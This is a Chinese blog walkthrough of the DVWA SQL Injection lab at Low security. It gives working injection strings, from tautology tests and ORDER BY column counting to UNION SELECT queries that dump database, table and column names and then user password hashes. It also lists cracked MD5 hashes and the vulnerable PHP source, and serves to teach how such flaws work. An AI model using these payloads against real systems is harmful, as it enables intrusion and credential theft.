DVWA——SQL Injection通关记录（Low）

偏执的太偏执、 2022-12-17 00:30 171阅读 0赞

# Security Level：Low #

### 1.判断注入点及注入类型 ###

看到的是一个输入框，输入数字有对应返回值

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70][]

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 1][]

所以这里应该是一个注入点，使用恒真恒假式来尝试一下

![20201021092925595.png][]

输入

> 1' and '1'='2

返回无结果，确定此处为注入点

再用恒真式来显示所有结果

输入

> 1' or '1'='1

（'1'='1'恒真，中间使用or连接则整个查询式子恒真，即可返回所有查询结果）

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 2][]

### 2.判断数据库中的字段数 ###

根据数据库的知识可以知道数据库对结果的排序语句为order by XXX

XXX为字段名称，第几列之类的

此处查询语句

> 1' or 1=1 order by 1\#

（后面的1=1不需要单引号是因为我们增加了注释符号\#，于是后面的语句都被注释掉了，则原函数尾部的单引号就不需要被闭合了）

查询结果如下

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 3][]

可以看出是根据First name的字母排序的，那此处有两个回显点，就是一下order by 2

查询语句

> 1' or 1=1 order by 2\#

查询结果如下：

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 4][]

可以看出是根据Surname的字母排序的

再看有无第三个字段，查询

> 1' or 1=1 order by 3\#

![2020102117595744.png][]

由此可知一共只有两个字段，即First name 和Surname

还可以使用联合查询的方式来猜解字段数

查询语句

> 'union select 1,2\#

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 5][]

回显了字段数以及他们回显的位置，字段1回显于First name，字段2回显于Surname

### 3.获取数据库名称 ###

由上一步知道了两个回显点，那我们就让这两个回显点显示出我们想要获取的信息，比如用户名和数据库名，使用联合查询，查询语句如下

> 'union select user(),database()\#

![20201021180516567.png][]

数据库名称dvwa

### 4.获取数据库中表的名称 ###

与获取数据库名称方式相似，都是使用联合查询

查询语句

> 'union select 1,group\_concat(table\_name) from information\_schema.tables where table\_schema='dvwa'\#

![20201021182108384.png][]

或查询语句

> 'union select 1,group\_concat(table\_name) from information\_schema.tables where table\_schema=database()\#

![20201021181155854.png][]

下面来解释一下这个语句

首先，因为搭建DVWA环境使用的是Apache和MySQL数据库，所以有关SQL注入都是默认MySQL数据库的注入

在MySQL数据库中有一个系统默认的数据库叫做 information\_schema，该数据库中的表都是只读的，不能进行更新、删除和插入等操作，也不能加载触发器，因为它们实际只是一个视图，不是基本表，没有关联的文件。

在information\_schema数据库中有三个很重要的表，分别是

*  information\_schema.schemata: 存储了mysql数据库中的所有数据库的库名
 *  information\_schema.tables： 存储了mysql数据库中的所有数据表的表名
 *  information\_schema.columns: 存储了mysql数据库中的所有列的列名

此处使用的是information\_schema.tables，因为我们这一步就是在查询表名，然后结合上一步查询到的数据库名，table\_schema表示的是数据库名称，条件语句where table\_schema='dvwa'

然后还使用了函数group\_concat(table\_name)，意思是将查询到的table\_name连在一起，默认用逗号分隔

更多参数解释详见文章[查询语句参数详解][Link 1]

所以查询出了两个表，guestbook和users

### 5.获取表中字段名 ###

查询语句

> 'union select 1,group\_concat(column\_name) from information\_schema.columns where table\_name='users'\#

![2020102118363646.png][]

方法和查询表名相同

查询到了字段名user和password这两个很关键的字段

### 6.尝试获取user和password字段信息 ###

查询语句

> 'union select user,password from users\#

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 6][]

获取信息成功

### 7.密码解密 ###

很明显密码是加密存储的，根据格式，密码口令为32位，因此可能会md5哈希值，根据在线解密网站进行解密，得到口令明文如下

> 5f4dcc3b5aa765d61d8327deb882cf99——password
> 
>     e99a18c428cb38d5f260853678922e03——abc123
> 
>     8d3533d75ae2c3966d7e0d4fcc69216b——charley
> 
>     0d107d09f5bbe40cade3de5c71e9e9b7——letmein
> 
>     5f4dcc3b5aa765d61d8327deb882cf99——password

至此所有信息已知，攻击者可以登陆后台进行后续操作

### 8.源码分析 ###

点击右下角View Source

![watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 7][]

SQL Injection Source
    vulnerabilities/sqli/source/low.php
    <?php
    
    if( isset( $_REQUEST[ 'Submit' ] ) ) {
        // Get input
        $id = $_REQUEST[ 'id' ];
    
        // Check database
        $query  = "SELECT first_name, last_name FROM users WHERE user_id = '$id';";
        $result = mysqli_query($GLOBALS["___mysqli_ston"],  $query ) or die( '<pre>' . ((is_object($GLOBALS["___mysqli_ston"])) ? mysqli_error($GLOBALS["___mysqli_ston"]) : (($___mysqli_res = mysqli_connect_error()) ? $___mysqli_res : false)) . '</pre>' );
    
        // Get results
        while( $row = mysqli_fetch_assoc( $result ) ) {
            // Get values
            $first = $row["first_name"];
            $last  = $row["last_name"];
    
            // Feedback for end user
            echo "<pre>ID: {$id}<br />First name: {$first}<br />Surname: {$last}</pre>";
        }
    
        mysqli_close($GLOBALS["___mysqli_ston"]);
    }
    
    ?>

由语句$query = "SELECT first\_name, last\_name FROM users WHERE user\_id = '$id';";可以明显看出网页对于输入的id没有进行任何过滤操作，此处攻击者可以构造SQL注入语句进行攻击。

[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70]: /images/20221123/68896592d3f841ed87fb309ac66958d9.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 1]: /images/20221123/e2a1b8555d7449b1aac3d3d5c480b7d6.png
[20201021092925595.png]: /images/20221123/41616d17a4254741b8ee354c8f2fd4cb.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 2]: /images/20221123/48ba831c38a0475abe335b406f2cc48a.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 3]: /images/20221123/0b4f8863b4234e5c937c9c6d16686a28.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 4]: /images/20221123/e47f027f2a534a52a40fb29df05b3925.png
[2020102117595744.png]: /images/20221123/f4992586a122482abec975ba1657146d.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 5]: /images/20221123/2ad7389563b345bdbe6b99a262dae77a.png
[20201021180516567.png]: /images/20221123/ca16227846bb487b8489c932de1ddec4.png
[20201021182108384.png]: /images/20221123/8dc0f1430dcd49949b930d89ecb03403.png
[20201021181155854.png]: /images/20221123/febe65d50980493b8536a141badd2b69.png
[Link 1]: https://blog.csdn.net/boshuzhang/article/details/65632708?utm_medium=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-2.edu_weight&depth_1-utm_source=distribute.pc_relevant.none-task-blog-BlogCommendFromMachineLearnPai2-2.edu_weight
[2020102118363646.png]: /images/20221123/eded84dbe8d54792afc49d88052f69c8.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 6]: /images/20221123/23dca16decc44526866c9ad23c2a3f3a.png
[watermark_type_ZmFuZ3poZW5naGVpdGk_shadow_10_text_aHR0cHM6Ly9ibG9nLmNzZG4ubmV0L3dlaXhpbl80Mzk2NTU5Nw_size_16_color_FFFFFF_t_70 7]: /images/20221123/37e7cdf7826c4cf5b99f292312af53aa.png